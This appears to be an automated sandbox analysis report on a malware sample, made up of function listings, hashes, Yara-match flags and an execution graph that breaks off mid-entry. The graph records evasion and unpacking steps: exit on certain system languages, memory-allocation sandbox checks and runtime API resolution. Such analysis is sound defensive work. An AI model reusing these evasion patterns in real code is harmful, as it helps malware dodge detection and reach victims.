                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalEnterListSection
                                                            • String ID: +$D$11@
                                                            • API String ID: 2909958271-3688954461
                                                            • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                            • Instruction ID: f7808640ab2bf069c674a98dda1ad071a6151c40b940f67af17a5b88fcc9f759
                                                            • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                            • Instruction Fuzzy Hash: 0C212C75A00219CFCF04EF68C581AAEB7B1FF48310B158469E906AB352CB70EE45CF90
                                                            Function 00410EB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: SpinWait
                                                            • String ID: 11@
                                                            • API String ID: 2810355486-1785270423
                                                            • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                            • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                            Function 00A6111F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: SpinWait
                                                            • String ID: 11@
                                                            • API String ID: 2810355486-1785270423
                                                            • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction ID: 9dcefb18ab1c388930c8e6bbff61ed71a85f0a4a7d56227f544fda6aaf134e50
                                                            • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                            • Instruction Fuzzy Hash: B50184319506229FCB259F39D91876ABFF0FB13721F1C862DD15683A64CA61EC80CB80
                                                            Function 004353E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: 11@$LCMapStringEx
                                                            • API String ID: 2568140703-3516914342
                                                            • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                            • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                            • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                            • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                            Function 0040C535 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ___std_exception_destroy
                                                            • String ID: f(@$ios_base::failbit set
                                                            • API String ID: 4194217158-3705395444
                                                            • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                            • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                            • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                            • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                            Function 00A6DC92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A6DCDA
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A6DCE8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 1687795959-1785270423
                                                            • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction ID: ac3452e582251ec439a1c139ead755842026ef3fbd06a32c3fba8030f3ae89cd
                                                            • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                            • Instruction Fuzzy Hash: 0EF0E939B005195BCB04EBA9DC95C5DF7B9AF85BA2310407AFD02D3351DBB4ED05C694
                                                            Function 0043524A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: DefaultUser
                                                            • String ID: 11@$GetUserDefaultLocaleName
                                                            • API String ID: 3358694519-96072240
                                                            • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                            • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                            • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                            • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                            Function 00435313 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: LocaleValid
                                                            • String ID: 11@$IsValidLocaleName
                                                            • API String ID: 1901932003-3041995494
                                                            • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                            • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                            • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                            • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                            Function 004352B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: 11@$InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3358978645
                                                            • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                            • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                            • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                            • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                            Function 004406AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: H_prolog3_catch
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3886170330-2084237596
                                                            • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                            • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                            • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                            Function 004350DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Free
                                                            • String ID: 11@$FlsFree
                                                            • API String ID: 3978063606-2352678666
                                                            • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                            • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                            • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                            • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                            Function 00435085 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: 11@$FlsAlloc
                                                            • API String ID: 2773662609-288891599
                                                            • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                            • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                            • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                            • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                            Function 00428D97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428DA3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DCA
                                                              • Part of subcall function 0042862D: RaiseException.KERNEL32(?,?,0040D8A3,00000000,00000000,00000000,00000000,?,?,?,?,0040D8A3,00000000,0045617C,00000000), ref: 0042868D
                                                            Strings
                                                            • Access violation - no RTTI data!, xrefs: 00428D9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                            • String ID: Access violation - no RTTI data!
                                                            • API String ID: 2053020834-2158758863
                                                            • Opcode ID: a8d8be5bcc2d3cd607e2d3fdf15623eb14b1e6aa89af65ac363ffb51a07ec0b7
                                                            • Instruction ID: 704b7bedd41b8decca9880961208c58d7d7e72978fd60f0bb7cc7eac6645feb8
                                                            • Opcode Fuzzy Hash: a8d8be5bcc2d3cd607e2d3fdf15623eb14b1e6aa89af65ac363ffb51a07ec0b7
                                                            • Instruction Fuzzy Hash: 39E04FB2A593185A9A04EAD5B8478DE73EC9E24710BA0445FF900D2081EE2DF958866D
                                                            Function 00429FC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: try_get_function
                                                            • String ID: 11@$FlsAlloc
                                                            • API String ID: 2742660187-288891599
                                                            • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                            • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                            • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                            • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                            Function 004212DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                            • String ID: pThreadProxy
                                                            • API String ID: 1687795959-3651400591
                                                            • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                            • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                            • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                            • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                            Function 0041A897 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                            • Hash.LIBCONCRT ref: 0041A8AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                            • String ID: +hB
                                                            • API String ID: 3232699325-4272926976
                                                            • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                            • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                            • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                            • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                            Function 0042AEAA Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                            • GetLastError.KERNEL32 ref: 0042AF4E
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                            • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                            • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                            • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A
                                                            Function 00A7B111 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00A52ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00A52ACD,00000000), ref: 00A7B1A7
                                                            • GetLastError.KERNEL32 ref: 00A7B1B5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00A52ACD,00000000), ref: 00A7B210
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1717984340-0
                                                            • Opcode ID: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                            • Instruction ID: 2961c2faea96eabd149332a3296e5f9efc03a123f4f67a224d2c737b01176593
                                                            • Opcode Fuzzy Hash: 9c3ecb0086aef467e58ab233896f4880e68e88dda1315a5ce820fb7ae6c11677
                                                            • Instruction Fuzzy Hash: 5441B1B5615206AFCF218F64CC54BBE7BA8EF12711F14C269E95DA71A2DB308D01CBB0

                                                            Execution Graph

                                                            Execution Coverage:6.5%
                                                            Dynamic/Decrypted Code Coverage:4.9%
                                                            Signature Coverage:1%
                                                            Total number of Nodes:1417
                                                            Total number of Limit Nodes:28
                                                            execution_graph 27667 409440 strlen malloc strcpy_s free std::exception::exception 27705 22d932a ??2@YAPAXI RaiseException allocator 27725 41ce48 LeaveCriticalSection __initptd 27767 22e1525 strtok_s strtok_s lstrlen lstrcpy ctype 27669 41b050 6 API calls 3 library calls 27708 22d9b37 9 API calls 27729 22e1c35 110 API calls 27769 406f60 memcpy 27671 41dc60 atexit 27672 22e6a0a ExitProcess 27771 410765 279 API calls 27730 417667 lstrcpy 27625 22d0005 27630 22d092b GetPEB 27625->27630 27627 22d0030 27631 22d003c 27627->27631 27630->27627 27632 22d0049 27631->27632 27646 22d0e0f SetErrorMode SetErrorMode 27632->27646 27637 22d0265 27638 22d02ce VirtualProtect 27637->27638 27640 22d030b 27638->27640 27639 22d0439 VirtualFree 27644 22d05f4 LoadLibraryA 27639->27644 27645 22d04be 27639->27645 27640->27639 27641 22d04e3 LoadLibraryA 27641->27645 27643 22d08c7 27644->27643 27645->27641 27645->27644 27647 22d0223 27646->27647 27648 22d0d90 27647->27648 27649 22d0dad 27648->27649 27650 22d0dbb GetPEB 27649->27650 27651 22d0238 VirtualAlloc 27649->27651 27650->27651 27651->27637 27773 22ed106 41 API calls __amsg_exit 27731 41b270 5 API calls 2 library calls 27676 22e15b3 18 API calls ctype 27775 22df567 56 API calls 27776 22dfd67 152 API calls 27677 41bc11 71 API calls 2 library calls 27678 22ebe78 162 API calls 2 library calls 27679 22ecd97 170 API calls 2 library calls 27680 22e3b7d 91 API calls 2 library calls 27681 41ac2c 71 API calls 2 library calls 27682 22e6a40 6 API calls 27779 22e6d18 643 API calls 27737 22e102b strtok_s lstrlen lstrcpy 27738 22e6c57 689 API calls 27739 22e140b strtok_s 27683 22e32ae 22 API calls 27741 22ed0af RtlLeaveCriticalSection __initptd 27684 4090c3 5 API calls allocator 27742 22e140b StrCmpCA strtok_s 27781 22ecd90 173 API calls 3 library calls 27686 22d6ebc VirtualProtect 27782 41abd0 free codecvt std::exception::_Tidy 27744 22e0cb6 30 API calls 27745 22e04b7 88 API calls 27784 413916 91 API calls 2 library calls 27785 4183dc 15 API calls 27746 22e102b StrCmpCA strtok_s lstrlen lstrcpy 27786 22ecd8f 6 API calls 2 library calls 27787 22e118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27690 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27748 41ceea SetUnhandledExceptionFilter 27749 22e3823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 26207 4169f0 26250 402260 26207->26250 26224 417850 3 API calls 26225 416a30 26224->26225 26226 4178e0 3 API calls 26225->26226 26227 416a43 26226->26227 26383 41a9b0 26227->26383 26229 416a64 26230 41a9b0 4 API calls 26229->26230 26231 416a6b 26230->26231 26232 41a9b0 4 API calls 26231->26232 26233 416a72 26232->26233 26234 41a9b0 4 API calls 26233->26234 26235 416a79 26234->26235 26236 41a9b0 4 API calls 26235->26236 26237 416a80 26236->26237 26391 41a8a0 26237->26391 26239 416b0c 26395 416920 GetSystemTime 26239->26395 26240 416a89 26240->26239 26242 416ac2 OpenEventA 26240->26242 26244 416af5 CloseHandle Sleep 26242->26244 26245 416ad9 26242->26245 26247 416b0a 26244->26247 26249 416ae1 CreateEventA 26245->26249 26247->26240 26248 416b16 CloseHandle ExitProcess 26249->26239 26592 4045c0 17 API calls 26250->26592 26252 402274 26253 4045c0 34 API calls 26252->26253 26254 40228d 26253->26254 26255 4045c0 34 API calls 26254->26255 26256 4022a6 26255->26256 26257 4045c0 34 API calls 26256->26257 26258 4022bf 26257->26258 26259 4045c0 34 API calls 26258->26259 26260 4022d8 26259->26260 26261 4045c0 34 API calls 26260->26261 26262 4022f1 26261->26262 26263 4045c0 34 API calls 26262->26263 26264 40230a 26263->26264 26265 4045c0 34 API calls 26264->26265 26266 402323 26265->26266 26267 4045c0 34 API calls 26266->26267 26268 40233c 26267->26268 26269 4045c0 34 API calls 26268->26269 26270 402355 26269->26270 26271 4045c0 34 API calls 26270->26271 26272 40236e 26271->26272 26273 4045c0 34 API calls 26272->26273 26274 402387 26273->26274 26275 4045c0 34 API calls 26274->26275 26276 4023a0 26275->26276 26277 4045c0 34 API calls 26276->26277 26278 4023b9 26277->26278 26279 4045c0 34 API calls 26278->26279 26280 4023d2 26279->26280 26281 4045c0 34 API calls 26280->26281 26282 4023eb 26281->26282 26283 4045c0 34 API calls 26282->26283 26284 402404 26283->26284 26285 4045c0 34 API calls 26284->26285 26286 40241d 26285->26286 26287 4045c0 34 API calls 26286->26287 26288 402436 26287->26288 26289 4045c0 34 API calls 26288->26289 26290 40244f 26289->26290 26291 4045c0 34 API calls 26290->26291 26292 402468 26291->26292 26293 4045c0 34 API calls 26292->26293 26294 402481 26293->26294 26295 4045c0 34 API calls 26294->26295 26296 40249a 26295->26296 26297 4045c0 34 API calls 26296->26297 26298 4024b3 26297->26298 26299 4045c0 34 API calls 26298->26299 26300 4024cc 26299->26300 26301 4045c0 34 API calls 26300->26301 26302 4024e5 26301->26302 26303 4045c0 34 API calls 26302->26303 26304 4024fe 26303->26304 26305 4045c0 34 API calls 26304->26305 26306 402517 26305->26306 26307 4045c0 34 API calls 26306->26307 26308 402530 26307->26308 26309 4045c0 34 API calls 26308->26309 26310 402549 26309->26310 26311 4045c0 34 API calls 26310->26311 26312 402562 26311->26312 26313 4045c0 34 API calls 26312->26313 26314 40257b 26313->26314 26315 4045c0 34 API calls 26314->26315 26316 402594 26315->26316 26317 4045c0 34 API calls 26316->26317 26318 4025ad 26317->26318 26319 4045c0 34 API calls 26318->26319 26320 4025c6 26319->26320 26321 4045c0 34 API calls 26320->26321 26322 4025df 26321->26322 26323 4045c0 34 API calls 26322->26323 26324 4025f8 26323->26324 26325 4045c0 34 API calls 26324->26325 26326 402611 26325->26326 26327 4045c0 34 API calls 26326->26327 26328 40262a 26327->26328 26329 4045c0 34 API calls 26328->26329 26330 402643 26329->26330 26331 4045c0 34 API calls 26330->26331 26332 40265c 26331->26332 26333 4045c0 34 API calls 26332->26333 26334 402675 26333->26334 26335 4045c0 34 API calls 26334->26335 26336 40268e 26335->26336 26337 419860 26336->26337 26596 419750 GetPEB 26337->26596 26339 419868 26340 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26339->26340 26341 41987a 26339->26341 26342 419af4 GetProcAddress 26340->26342 26343 419b0d 26340->26343 26344 41988c 21 API calls 26341->26344 26342->26343 26345 419b46 26343->26345 26346 419b16 GetProcAddress GetProcAddress 26343->26346 26344->26340 26347 419b68 26345->26347 26348 419b4f GetProcAddress 26345->26348 26346->26345 26349 419b71 GetProcAddress 26347->26349 26350 419b89 26347->26350 26348->26347 26349->26350 26351 416a00 26350->26351 26352 419b92 GetProcAddress GetProcAddress 26350->26352 26353 41a740 26351->26353 26352->26351 26354 41a750 26353->26354 26355 416a0d 26354->26355 26356 41a77e lstrcpy 26354->26356 26357 4011d0 26355->26357 26356->26355 26358 4011e8 26357->26358 26359 401217 26358->26359 26360 40120f ExitProcess 26358->26360 26361 401160 GetSystemInfo 26359->26361 26362 401184 26361->26362 26363 40117c ExitProcess 26361->26363 26364 401110 GetCurrentProcess VirtualAllocExNuma 26362->26364 26365 401141 ExitProcess 26364->26365 26366 401149 26364->26366 26597 4010a0 VirtualAlloc 26366->26597 26369 401220 26601 4189b0 26369->26601 26372 401249 __aulldiv 26373 40129a 26372->26373 26374 401292 ExitProcess 26372->26374 26375 416770 GetUserDefaultLangID 26373->26375 26376 4167d3 GetUserDefaultLCID 26375->26376 26377 416792 26375->26377 26376->26224 26377->26376 26378 4167c1 ExitProcess 26377->26378 26379 4167a3 ExitProcess 26377->26379 26380 4167b7 ExitProcess 26377->26380 26381 4167cb ExitProcess 26377->26381 26382 4167ad ExitProcess 26377->26382 26603 41a710 26383->26603 26385 41a9c1 lstrlenA 26387 41a9e0 26385->26387 26386 41aa18 26604 41a7a0 26386->26604 26387->26386 26389 41a9fa lstrcpy lstrcatA 26387->26389 26389->26386 26390 41aa24 26390->26229 26392 41a8bb 26391->26392 26393 41a90b 26392->26393 26394 41a8f9 lstrcpy 26392->26394 26393->26240 26394->26393 26608 416820 26395->26608 26397 41698e 26398 416998 sscanf 26397->26398 26637 41a800 26398->26637 26400 4169aa SystemTimeToFileTime SystemTimeToFileTime 26401 